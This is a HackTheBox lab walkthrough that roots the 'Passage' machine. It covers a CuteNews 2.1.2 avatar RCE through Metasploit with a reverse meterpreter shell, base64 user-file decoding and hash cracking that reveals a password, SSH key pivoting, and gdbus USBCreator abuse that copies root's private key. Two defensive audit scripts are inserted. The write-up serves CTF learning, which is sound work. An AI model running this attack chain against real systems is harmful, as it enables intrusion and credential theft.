Passage HackTheBox WalkThrough

This is the Passage HackTheBox machine walkthrough. In this writeup I demonstrate, step by step, how I rooted the Passage HTB machine. Before starting, a few facts about this box: it is a Linux machine with IP address 10.10.10.206, and its maker rated its difficulty as medium.

First of all, connect your local machine to the VPN so that you can reach the lab machines, and confirm connectivity to the Passage machine by pinging its IP address 10.10.10.206. If everything is fine, start hacking.

As usual, I began by scanning the IP address to get some starting points. I used nmap for this task; the result is below.

Scanning

$ nmap -sC -sV -oN passage_scan 10.10.10.206

[Image: Nmap scan output]

Nmap revealed that ports 22 and 80 are open: an SSH server is running on port 22 and an Apache2 web server on port 80. Since Apache is serving port 80, there must be a website hosted on this IP. Browsing to http://10.10.10.206/ showed a webpage titled Passage News.

[Image: Passage web app home page]

Scrolling to the bottom revealed the footer "Powered by: CuteNews". I immediately googled CuteNews and found that it is an open source Content Management System (CMS) for hosting news articles. Since it is a CMS, there must be some user(s) who write blog posts on this website. After some time I found two email addresses, [email protected] & [email protected].

So we have two users, paul and nadav, extracted from their email addresses. I added them to my notes and proceeded with further enumeration. Checking the page source (CTRL+U) revealed the URL http://10.10.10.206/CuteNews, the installation folder of CuteNews. Visiting this page showed register and login options and revealed the running CuteNews version, 2.1.2.

[Image: Login page of the CuteNews CMS]

Whenever I learn the name and version of a piece of software or a CMS, I immediately search for public exploits for it. So I used searchsploit [a CLI tool to query the exploit-db database] to search for an exploit for CuteNews 2.1.2.

Searching Public Exploit

$ searchsploit CuteNews 2.1.2

[Image: Searching for a public CuteNews 2.1.2 exploit with searchsploit]

There is a Remote Code Execution exploit for CuteNews 2.1.2, and it also exists as a Metasploit module. So I launched Metasploit to exploit this vulnerability. But searching for CuteNews in Metasploit gave the message "No results from search".

Since this module is not present in the installed metasploit-framework, we have to download it explicitly and add it to our metasploit-framework. The exploit link is https://www.exploit-db.com/download/46698 . I followed the steps below to integrate the module into Metasploit.

$ msfdb run

msf5 > search cutenews

msf5 > wget 'https://www.exploit-db.com/download/46698'

msf5 > mv 46698 /usr/share/metasploit-framework/modules/exploits/unix/webapp/cutenews_avatar_rce.rb

We have to add a comma [,] to this exploit because it contains a syntax error; see this issue in the rapid7 repo.

msf5 > vi /usr/share/metasploit-framework/modules/exploits/unix/webapp/cutenews_avatar_rce.rb

[Image: Editing the CuteNews exploit before adding it to the Metasploit Framework]

After adding the exploit and making the change, we have to reload all modules.

msf5 > reload_all

msf5 > search cutenews

[Image: Reloading all Metasploit modules after adding the CuteNews RCE exploit]

Now we have successfully added the CuteNews RCE exploit to our metasploit-framework. After loading the CuteNews module, the msf command show options, which lists the available options, also shows USERNAME & PASSWORD. So CuteNews 2.1.2 actually has an authenticated RCE vulnerability, because the exploit requires a username and password. As we already have a register button at http://10.10.10.206/CuteNews, I registered a user with the name test1 & password test1.

[Image: Login page of the CuteNews CMS]

It is time to get a meterpreter shell. I used the above credentials to get the shell.

Getting Shell

msf5 > use exploit/unix/webapp/cutenews_avatar_rce

msf5 exploit(unix/webapp/cutenews_avatar_rce) > set RHOSTS 10.10.10.206

msf5 exploit(unix/webapp/cutenews_avatar_rce) > set payload php/meterpreter/reverse_tcp

msf5 exploit(unix/webapp/cutenews_avatar_rce) > set LHOST 10.10.14.191

msf5 exploit(unix/webapp/cutenews_avatar_rce) > set USERNAME test1

msf5 exploit(unix/webapp/cutenews_avatar_rce) > set PASSWORD test1

msf5 exploit(unix/webapp/cutenews_avatar_rce) > set VHOST 10.10.14.191

msf5 exploit(unix/webapp/cutenews_avatar_rce) > exploit

meterpreter > sysinfo

Note: If your meterpreter shell doesn't work, background the session and run the exploit again; it may take 3-4 attempts. If it still does not work, use the unstaged payload php/meterpreter_reverse_tcp instead of the staged one.

[Image: Running the CuteNews exploit to get a meterpreter shell]

Got a meterpreter shell. I upgraded it to a fully interactive Linux shell so that I could run all Linux commands remotely.

Upgrading Shell

meterpreter > shell

$ python -c 'import pty;pty.spawn("/bin/bash")'

$ export TERM=xterm-256color

CTRL+Z    // to background the shell

$ stty raw -echo

$ fg    // then press Enter twice to bring the session back to the foreground

[Image: Upgrading the meterpreter shell to a fully interactive Linux shell]

After some enumeration I found a file named lines inside the directory /var/www/html/CuteNews/cdata/users/. It contains the information of all users in base64-encoded form. After decoding it, I found the SHA256 hash of user paul.

$ cat /var/www/html/CuteNews/cdata/users/lines

[Image: Base64-encoded credentials of user paul in the file lines, and the decoded record]

paul : e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd

Luckily, CrackStation had this hash in its lookup tables and returned the password.

[Image: Cracking the SHA256 hash on crackstation.net]

So we have the credentials paul : atlanta1.
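As an added example (not the writeup's own code, and not part of CuteNews), here is a defender-side audit of a CuteNews-style cdata/users/lines file as described above: it decodes each base64 record, pulls out the username and stored hash, and flags accounts whose password is stored as a bare unsalted SHA256 hash, as well as hashes shared by more than one account. The record layout inside the base64 (a PHP-serialized array with "name" and "pass" keys) is an assumption modelled on the description above, and the sample records are constructed.

```python
import base64
import re
from collections import defaultdict

# Constructed sample of a CuteNews-style cdata/users/lines file: one base64 record per
# line. The decoded layout (a PHP-serialized array with "name" and "pass" keys) is an
# assumption; paul's hash is the one shown in the writeup, the other two are made up.
_RECORDS = [
    'a:2:{s:4:"name";s:4:"paul";s:4:"pass";s:64:"e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd";}',
    'a:2:{s:4:"name";s:5:"nadav";s:4:"pass";s:64:"' + "a" * 64 + '";}',
    'a:2:{s:4:"name";s:5:"test1";s:4:"pass";s:64:"' + "a" * 64 + '";}',
]
SAMPLE_LINES = "\n".join(base64.b64encode(r.encode()).decode() for r in _RECORDS)

_USER_RE = re.compile(r's:4:"name";s:\d+:"([^"]*)".*?s:4:"pass";s:\d+:"([^"]*)"')
_HEX_SHA256_RE = re.compile(r"^[0-9a-f]{64}$")

def parse_users(text):
    """Decode each base64 line and return [(username, stored_hash), ...]."""
    users = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            decoded = base64.b64decode(line, validate=True).decode("utf-8", "replace")
        except ValueError:  # not valid base64: skip the record rather than abort
            continue
        match = _USER_RE.search(decoded)
        if match:
            users.append((match.group(1), match.group(2)))
    return users

def audit(text):
    """Flag accounts stored with a bare unsalted SHA256 hash (fast to brute-force and
    directly searchable in lookup tables such as CrackStation) and hashes shared by
    several accounts, which without a salt reveals password reuse at a glance."""
    users = parse_users(text)
    unsalted = [name for name, h in users if _HEX_SHA256_RE.match(h)]
    by_hash = defaultdict(list)
    for name, h in users:
        by_hash[h].append(name)
    shared = {h: names for h, names in by_hash.items() if len(names) > 1}
    return {"unsalted_sha256": unsalted, "shared_hashes": shared}
```

On a real install the file to feed in is the one the walkthrough names, and the fix is a salted, slow password hash plus keeping the data directory out of the web root.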

I switched to user paul with the password atlanta1.

$ su paul

Password: atlanta1

[Image: Switching to user paul with the found credentials]

Capture User Flag

$ cat user.txt

[Image: User flag captured]

Privilege Escalation

After some initial enumeration I found that the authorized_keys file of user paul contains the key of user nadav. It means user paul can connect to user nadav locally via SSH.

[Image: Checking the authorized_keys file of user paul]

$ ssh nadav@localhost

[Image: SSH into Passage as user nadav locally]

Successfully logged in as nadav through SSH. We are nadav now.

After some more enumeration I did not find any privilege escalation vector, so I ran linpeas.sh [a post-exploitation enumeration script] for help, and it reported that gdbus could be used to escalate privileges. I did not know how to escalate privileges using gdbus, so I googled "privilege escalation using gdbus" and got this article as the first result.

According to this article, gdbus allows a user to overwrite arbitrary files on the file system, as root, with no password prompt. Put differently, any user can copy the contents of root-owned files without any password. So I used this command to copy the id_rsa key of the root user, so that I could SSH in as root with this key.
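As an added example (not part of the original writeup), here is a small audit a defender can run over the authorized_keys files of all local accounts to spot the cross-account trust used above: it computes the SHA256 fingerprint of each key in the same form ssh-keygen -lf prints and reports any key accepted by more than one account. The key material and account layout are constructed for the example, not the box's real keys.

```python
import base64
import hashlib
import struct
from collections import defaultdict

def _ssh_string(b):
    """Length-prefixed string as used in the SSH public key wire format."""
    return struct.pack(">I", len(b)) + b

def _constructed_key(seed, comment):
    """Syntactically valid ssh-ed25519 public key line built from a constructed
    32-byte value (not a real key pair; only used so fingerprints are computable)."""
    blob = _ssh_string(b"ssh-ed25519") + _ssh_string(hashlib.sha256(seed).digest())
    return "ssh-ed25519 " + base64.b64encode(blob).decode() + " " + comment

# Constructed sample: authorized_keys contents per local account. nadav's key is
# also accepted by paul's account, mirroring the cross-account trust found above.
SAMPLE_AUTHORIZED_KEYS = {
    "paul": _constructed_key(b"nadav-seed", "nadav@passage") + "\n",
    "nadav": _constructed_key(b"nadav-seed", "nadav@passage") + "\n",
    "root": "# no shared key here\n" + _constructed_key(b"root-seed", "root@passage") + "\n",
}

def fingerprint(pubkey_line):
    """SHA256 fingerprint in the form ssh-keygen -lf prints (base64, no '=' padding)."""
    blob = base64.b64decode(pubkey_line.split()[1])
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")

def parse_authorized_keys(text):
    """Yield (fingerprint, comment) per key line; blanks and comments are skipped.
    Lines with authorized_keys options before the key type are not handled here."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if len(parts) < 2:
            continue
        yield fingerprint(line), (parts[2] if len(parts) > 2 else "")

def shared_keys(per_user):
    """Map fingerprint -> sorted accounts that accept it, keeping only keys trusted by
    more than one account: each one is a local lateral-movement path to review."""
    owners = defaultdict(set)
    for user, text in per_user.items():
        for fp, _comment in parse_authorized_keys(text):
            owners[fp].add(user)
    return {fp: sorted(users) for fp, users in owners.items() if len(users) > 1}
```

On a live host, replace the sample dict with the contents of each user's ~/.ssh/authorized_keys and compare the reported fingerprints against ssh-keygen -lf output.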

$ gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/key.txt true

$ cat /tmp/key.txt

[Image: Copying the id_rsa key of user root by exploiting gdbus]

We have got the private key of user root. I copied this key into the file root_key on my local PC, changed the permissions of root_key to 600, and connected as root using SSH.

$ vi root_key

$ chmod 600 root_key

$ ssh -i root_key [email protected]

root@passage:~# whoami && id

[Image: Logging in to the root account using the id_rsa key]

We have successfully escalated the privilege to root. Now we can capture root flag.

Capture Root Flag

$ cat root.txt

[Image: Root flag captured]

This is how I rooted Passage HackTheBox. I learnt a lot while hunting this box, and I hope you have also learnt something new from it. Thanks for reading this writeup. For any suggestion or query related to the walkthrough, feel free to contact us at [email protected].

You can read walkthroughs of similar machines from here.


Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am an InfoSec Consultant by day and a Bug Bounty Hunter & CTF player by night. Sometimes I write walkthroughs and other cyber security articles here. You can connect with me at https://www.linkedin.com/in/deepakdkm/